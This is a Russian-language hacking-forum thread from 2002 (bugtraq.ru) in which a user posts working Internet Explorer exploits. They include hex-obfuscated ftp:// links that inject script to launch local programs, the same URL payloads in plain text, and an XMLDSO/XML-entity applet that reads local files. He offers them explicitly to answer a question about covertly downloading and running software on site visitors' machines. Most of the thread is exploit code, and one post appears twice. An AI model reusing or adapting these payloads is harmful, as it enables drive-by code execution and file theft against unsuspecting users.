информационная безопасность без паники и всерьез  подробно о проекте
			Анализ криптографических сетевых...   Модель надежности двухузлового...   Специальные марковские модели надежности...   Бэкдор в xz/liblzma, предназначенный...   Три миллиона электронных замков...   Doom на газонокосилках
	главная обзор RSN блог библиотека закон бред форум dnet о проекте
	bugtraq.ru / форум / hacking		Имя Пароль

ФОРУМ если вы видите этот текст, отключите в настройках форума использование JavaScript регистрация Легенда:   новое сообщение   закрытая нитка   новое сообщение   в закрытой нитке   старое сообщение	Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания. Новичкам также крайне полезно ознакомиться с данным документом. IE bugs 06.09.02 14:12  Число просмотров: 1227 Автор: FreeHermit Статус: Незарегистрированный пользователь <"чистая" ссылка> ---[ Запуск любой программы / выполнение любой команды (IE) Вот простой html'ник который запускает notepad.exe... <head> <title>test</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> </head> <body> <p> <a href="ftp://%22%3e%3cscript%3e%73%65%74%54%69%6d%65%6f%75%74%28%66%75%6e%63%74%69%6f%6e%28%29%7b%64%6f%63%75%6d%65%6e%74%2e%62%6f%64%79%2e%69%6e%6e%65%72%48%54%4d%4c%3d%27%3c%6f%62%6a%65%63%74%20%63%6c%61%73%73%69%64%3d%22%63%6c%73%69%64%3a%31%31%31%31%31%31%31%31%2d%31%31%31%31%2d%31%31%31%31%2d%31%31%31%31%2d%31%31%31%31%31%31%31%31%31%31%31%31%22%20%20%63%6f%64%65%62%61%73%65%3d%22%66%69%6c%65%3a%2f%2f%63%3a%2f%77%69%6e%6e%74%2f%6e%6f%74%65%70%61%64%2e%65%78%65%22%3e%3c%2f%6f%62%6a%65%63%74%3e%27%7d%2c%20%32%30%30%29%3b%3c%2fscript%3e%20" target="_blank"> C:/Winnt/notepad.exe Windows NT/2000/XP) </a>. <br /> <a href="ftp://%22%3e%3cscript%3e%73%65%74%54%69%6d%65%6f%75%74%28%66%75%6e%63%74%69%6f%6e%28%29%7b%64%6f%63%75%6d%65%6e%74%2e%62%6f%64%79%2e%69%6e%6e%65%72%48%54%4d%4c%3d%27%3c%6f%62%6a%65%63%74%20%63%6c%61%73%73%69%64%3d%22%63%6c%73%69%64%3a%31%31%31%31%31%31%31%31%2d%31%31%31%31%2d%31%31%31%31%2d%31%31%31%31%2d%31%31%31%31%31%31%31%31%31%31%31%31%22%20%20%63%6f%64%65%62%61%73%65%3d%22%66%69%6c%65%3a%2f%2f%63%3a%2f%77%69%6e%64%6f%77%73%2f%6e%6f%74%65%70%61%64%2e%65%78%65%22%3e%3c%2f%6f%62%6a%65%63%74%3e%27%7d%2c%20%32%30%30%29%3b%3c%2fscript%3e%20" target="_blank"> C:/Windows/notepad.exe (Windows 9x) </a> </p> </body> <hacking> IE bugs 06.09.02 13:44   Автор: FreeHermit Статус: Незарегистрированный пользователь <"чистая" ссылка> Тут как-то поднималься вопрос: >Возможно ли сделать такую вещь: Когда посетитель заходит на сайт ему >автоматически без его ведома скачивается программа, конечно же он не >должен видеть как это происходит. отвечаю: ---[ Чтение любого файла (IE) Создай на диске C: файл test.txt <html> <head> <base href="file:///C:/"> </head> <body> <applet code="com.ms.xml.dso.XMLDSO.class" width="0" height="0" id="xmldso" MAYSCRIPT="true"> <?xml version="1.0"?> <!DOCTYPE file [ <!ELEMENT file (#PCDATA) > <!ENTITY contents SYSTEM "file:///C:/test.txt"> ]> <file> &contents; </file> </applet> <script language="javascript"> setTimeout("showIt()",2000); function showIt() { var jelmer = xmldso.getDocument(); alert(jelmer.Text); } </script> </body> </html> ---[ Запуск любых программ и выполнение команд Вводить в строчке URL -[ 9x: ftp://"><script>setTimeout(function(){document.body.innerHTML='<object%20classid="clsid:11111111-1111-1111-1111-111111111111"%20%20codebase="file://c:/windows/notepad.exe"></object>'},%20200);</script>/ -[ NT/2000/XP: ftp://"><script>setTimeout(function(){document.body.innerHTML='<object%20classid="clsid:11111111-1111-1111-1111-111111111111"%20%20codebase="file://c:/winnt/notepad.exe"></object>'},%20200);</script>/ IE bugs 06.09.02 14:12   Автор: FreeHermit Статус: Незарегистрированный пользователь <"чистая" ссылка> ---[ Запуск любой программы / выполнение любой команды (IE) Вот простой html'ник который запускает notepad.exe... <head> <title>test</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> </head> <body> <p> <a href="ftp://%22%3e%3cscript%3e%73%65%74%54%69%6d%65%6f%75%74%28%66%75%6e%63%74%69%6f%6e%28%29%7b%64%6f%63%75%6d%65%6e%74%2e%62%6f%64%79%2e%69%6e%6e%65%72%48%54%4d%4c%3d%27%3c%6f%62%6a%65%63%74%20%63%6c%61%73%73%69%64%3d%22%63%6c%73%69%64%3a%31%31%31%31%31%31%31%31%2d%31%31%31%31%2d%31%31%31%31%2d%31%31%31%31%2d%31%31%31%31%31%31%31%31%31%31%31%31%22%20%20%63%6f%64%65%62%61%73%65%3d%22%66%69%6c%65%3a%2f%2f%63%3a%2f%77%69%6e%6e%74%2f%6e%6f%74%65%70%61%64%2e%65%78%65%22%3e%3c%2f%6f%62%6a%65%63%74%3e%27%7d%2c%20%32%30%30%29%3b%3c%2fscript%3e%20" target="_blank"> C:/Winnt/notepad.exe Windows NT/2000/XP) </a>. <br /> <a href="ftp://%22%3e%3cscript%3e%73%65%74%54%69%6d%65%6f%75%74%28%66%75%6e%63%74%69%6f%6e%28%29%7b%64%6f%63%75%6d%65%6e%74%2e%62%6f%64%79%2e%69%6e%6e%65%72%48%54%4d%4c%3d%27%3c%6f%62%6a%65%63%74%20%63%6c%61%73%73%69%64%3d%22%63%6c%73%69%64%3a%31%31%31%31%31%31%31%31%2d%31%31%31%31%2d%31%31%31%31%2d%31%31%31%31%2d%31%31%31%31%31%31%31%31%31%31%31%31%22%20%20%63%6f%64%65%62%61%73%65%3d%22%66%69%6c%65%3a%2f%2f%63%3a%2f%77%69%6e%64%6f%77%73%2f%6e%6f%74%65%70%61%64%2e%65%78%65%22%3e%3c%2f%6f%62%6a%65%63%74%3e%27%7d%2c%20%32%30%30%29%3b%3c%2fscript%3e%20" target="_blank"> C:/Windows/notepad.exe (Windows 9x) </a> </p> </body> 1

Copyright © 2001-2024 Dmitry Leonov

Page build time: 0 s

Design: Vadim Derkach